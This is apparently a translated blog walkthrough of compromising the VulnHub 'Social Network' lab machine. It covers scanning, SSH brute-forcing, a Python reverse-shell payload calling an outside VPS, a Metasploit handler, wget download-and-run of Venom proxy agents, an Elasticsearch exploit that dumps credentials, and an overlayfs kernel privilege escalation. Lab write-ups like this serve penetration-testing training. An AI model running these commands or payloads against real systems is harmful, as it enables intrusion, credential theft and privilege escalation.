Article directory
- Environment build
- collect message
-
- Host discovery:
- port scan
- web penetration
-
- (CVE-2019-14322) Pallets Werkzeug 0.15.4 path traversal vulnerability
- Code Injection – Bounce Shell
- About Dockerfile
- Determine whether it is in the Docker environment:
-
- Command Shell upgrade to Meterpreter
- method one
- Method Two
- There is an intranet environment in the Docker environment
-
- Intranet host detection
- shell script -ping survival ip
- Intranet penetration – local msf automation
- Manual public network vps intranet penetration
-
- Venom Proxy
- Vulnerability Exploitation-Kernel Privilege Escalation-Attack Code Modification
- Thoughts and Questions
- refer to
Keywords: host discovery, port scanning, service discovery, path crawling, code injection, shell script, intranet information collection, intranet penetration, exploit, password cracking, local privilege escalation, attack code modification
Environment construction
Official website download address (download is slow): https://www.vulnhub.com/entry/boredhackerblog-social-network,454/
Target machine Baidu cloud link
When I built it for the first time, I carried out host detection and found that the target machine only opened 22 ssh services. I wondered if the ssh blasting would be over. After checking the information, I found that the target machine should also open port 5000. Then re-downloaded and imported once before it was normal (there is also a situation where even the host cannot be detected, it may be a problem with the network adapter settings)
Information collection
Host Discovery:
arp-scan -l
Port scanning
nmap -sS -sV -T4 -A -p- 10.10.10.154
Two ways of thinking: 1. ssh blasting 2. Web service built by Python on port 5000
ssh blasting: see luck
use auxiliary/scanner/ssh/ssh_login set rhost 10.10.10.154 set USER_FILE user.txt set PASS_FILE pass.txt run
Web penetration
scan dirsearch
python3 dirsearch.py -u http://10.10.10.154:5000/ -e html js
Inserted a bit xss unanalyzed
Based on the information detected by the service
5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
|_http-title: Leave a message
Find related vulnerabilities on the Internet to correspond to the version
(CVE-2019-14322) Pallets Werkzeug 0.15.4 path traversal vulnerability
Search for Werkzeug historical vulnerabilities and found this
In Pallets Werkzeug prior to 0.15.5, shareddatmiddleware mishandled drive names in Windows pathnames.
Tried Poc, the vulnerability does not exist
Code injection – reverse shell
According to the page prompt, there may be code execution here
Rebound shell platform: https://forum.ywhack.com/shell.php
The target machine is a Python environment, try to inject the Python version to reverse the shell command
Another problem is that the codes given here are all executed in the form of command lines to go online, but the prompt given on the target machine page is executed by the exec() function, and the shell cannot be rebounded if copied directly.
The middle parameter part with guaranteed quantity can be launched normally
Payload
import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("47.94.xx.xx",5566)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);
In Python, semicolons can also be used to separate multiple statements; in this code, semicolons are used to put multiple statements on one line, so that only one line of code needs to be copied and pasted when executing the code
After executing the relevant command, the Dockerfile file is found, which means that the web service opened on port 5555 may be in Docker
About Dockerfile
Dockerfile defines the image and relies on the image to run the container, so the Dockerfile is the key to the image and the container
Dockerfile is a text file, which contains a series of instructions (Instruction), each instruction builds a layer, so the content of each instruction is to describe how the layer should be built
Judge whether it is in the Docker environment:
Method 1: Determine the .dockerenv file in the root directory
ls -alh /.dockerenv #Non-docker environment, without this .dockerenv file
Method 2: Query the cgroup information of the system process
cat /proc/1/cgroup
The Docker environment is executed as follows
The non-Docker environment is as follows
Real Hammer Dokcer Environment
Command Shell upgrade to Meterpreter
Because msf is more convenient. So transfer the shell to msf
msf6> use exploit/multi/handler msf6 exploit(multi/handler) > set payload cmd/unix/reverse_bash msf6 exploit(multi/handler) > set lhost 0.0.0.0 msf6 exploit(multi/handler) > set lport 6677 msf6 exploit(multi/handler) > exploit
Another window listens to the local port 6677, and uses nc to bounce back again
Now there is only one shell, but how can I use other functions of msf? Upgrade Command Shell to Meterpreter
Method 1
sesssions -u 1
But it’s a pity here that the upgrade was not successful on the public network vps
Test the same LAN kali Yes
Method 2
msf6 exploit(multi/handler) > use post /multi/manage/shell_to_meterpreter msf6 post(multi/manage/shell_to_meterpreter) > set session 1 session => 1 msf6 post(multi/manage/shell_to_meterpreter) > exploit
There is still no success in upgrading here. I guess it may be a problem with the public network vps I use. Using local kali can be used
There is an intranet environment in the Docker environment
Intranet host detection
ip a
The subnet mask here has 16 bits, which means that the number of hosts is at most 2 to the 16th power
shell script – ping survival ip
for i in $(for j in $(seq 1 254));do ping -c 1 172.17.$i.$j;done #Scan 65535 hosts
Because it is a Docker environment, so many mirrors will not be opened, so only the IP of the c segment is scanned
for i in $(seq 1 254);do ping -c 1 172.17.0.$i;done
Three hosts have survived except their own 172.17.0.2, and the remaining two are 172.17.0.1 and 172.17.0.3
Because other tools cannot be used for intranet penetration directly from the bounced bash, here we use a proxy
Intranet penetration – local msf automation
Automatically add routes
add proxy
use auxiliary/server/socks_proxy set SRVPORT 1234
Modify the proxychains configuration file
vi /etc/proxychains.conf
Then use proxychains for subsequent operations
Local kali service detection is much faster than through vps
proxychains nmap -sV -sT 172.17.0.1
proxychains nmap -sV -sT 172.17.0.2
Pay attention to the http service opened on port 9200 here
proxychains nmap -sV -sT 172.17.0.3
There are still many questions here?
- Both hosts 1 and 3 have port 5000 and the same service. Which one is the intranet ip of 10.10.154?
- And what is the network structure in the intranet environment built using Docker?
Use the built-in firefox conditional socks proxy in local kali to access port 5000 of hosts 1 and 3 and port 9200 of host 2
Cooperate with visiting 10.10.10.154 on the physical machine and leaving a message, and found that 1 and 3 both correspond to this website
Access 172.17.0.2:9200 port
Find the public elasticsearch version 1.4.2 historical vulnerability online
Find EXP to use directly
https://github.com/t0kx/exploit-CVE-2015-1427
Directly root but this is a POC seems
EXP can be found in msf
searchsploit elasticsearch
proxychains python2 /usr/share/exploitdb/exploits/linux/remote/36337.py 172.17.0.2
Get some users and md5 encrypted passwords, put them in cmd5.com for decryption
Can be decrypted, some need to pay…
The one that can log in is john:1337hack
Here you can use ssh to log in directly
After ssh login, it is found that it is a normal user authority
Manual public network vps intranet penetration
Venom Proxy
https://github.com/Dliv3/Venom
Venom is a multi-level proxy tool developed in Go designed for penetration testers.
Venom can connect multiple nodes, and then use the nodes as a springboard to build multi-level agents.
Penetration testers can use Venom to easily proxy network traffic to multi-layer intranets and manage proxy nodes easily.
Open the server (VPS)
./admin_linux_x64 -lport 7777
Python starts a temporary http service, downloads and executes it through a file on the target machine
python3 -m http.server 88 #Note to execute in the Venom file directory
Execute in the target machine shell
wget http://47.94.130.42:88/agent_linux_x64 chmod +x agent_linux_x64 ./agent_linux_x64 -rhost 47.94.130.42 -rport 7777 #Start the client
The server is successfully connected, and a session is obtained, enter this session, and open a socks proxy
Of course, tools are still needed for traffic forwarding. The Linux platform uses proxychains
For windows proxy details, see Proxy Socks Protocol & amp; Routing does not go online & amp; Post-infiltration communication & amp; CS-MSF control goes online
Here I use local kali to connect to the Socks proxy enabled by vps (tools are convenient)
Modify the configuration file:
vim /etc/proxychains.conf
proxychains nmap -sV -sT 172.17.0.1
The port range is not specified here, so scan some common services and ports
proxychains nmap -sV -sT 172.17.0.1 -p 1-65535 #p parameter can specify the port range
Just scan for a minute or two. If you don’t go through the public network proxy, the speed may be faster. Of course, in the real environment, you need to control the scanning rate to prevent the proxy ip from being blocked. The subsequent penetration steps are equivalent to the msf automation above. No more demos
Vulnerability Exploitation-Kernel Privilege Escalation-Attack Code Modification
Here I uploaded les.sh for analysis, looking for exploitable loopholes, the classic Dirty Cow I used at the beginning, when compiling, I found that there is no gcc compiler on the target machine, and of course there is no permission for package management (install gcc ), I wonder if there are other compilers to use, such as clang or tcc, to compile my own exploit program, of course there is no one, so what if I compile it locally into an executable program and upload it? We all know that programs compiled by different Linux architectures cannot be used universally (different instruction sets). Check the information on the Internet. GCC supports compiling programs of multiple architectures on one computer at the same time, which means that programs compiled on the X86 architecture using the GCC compiler can also run on the ARM architecture. So I uploaded the dirty cow vulnerability compiled locally by kali to the target machine
It shows that the libstdc++ library is missing, try apt-get install libstdc++ 6, the answer is no permission , so can you copy the library file from kali and use it? The copied file needs to be placed in the /usr/lib/ directory, otherwise the program cannot be called normally, but this directory is prohibited from being accessed by ordinary users. I am desperate, yes, I saw the attack code modification prompted by the shooting range, and suddenly thought of changing the dirty cow source code to call the library file I placed, and then recompiling and using it seems to be possible. But I don’t have enough internal skills, I was at a loss after looking at the C language source code for a while… (There is no trace of library exploitation in the source code of Dirty Cow EXP, let’s replace other vulnerabilities to elevate rights)
**This is a vulnerability exploited by other big guys ‘overlayfs’ Local Privilege Escalation **
Applicable linux kernel version: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)
The position of EXP in kali
/usr/share/exploitdb/exploits/linux/local/37292.c
Delete part of the ghost code, compile it in kali, it is normal to report an error, and the program will also be generated
According to the above idea, locate the ofs-lib.so file and pack it together and place it in the target machine, and execute it after empowering
locate ofs-lib.so
/usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so
Thoughts and questions
Unskilled in exploiting msf exploits
Not familiar with building an intranet environment with Docker
After seeing the docker environment, I didn’t try some escape methods, because I saw that the introduction of the target machine did not include the keyword escape, and I should try to escape in the real environment.
The level of modifying EXP is not enough, and I am not familiar with the calling of library files and the compilation process
One target drone for one day emmm
If the content of the article is insufficient, it will be supplemented later
Reference
https://www.freebuf.com/articles/web/321995.html
2023-3-24 Memorial by whgojp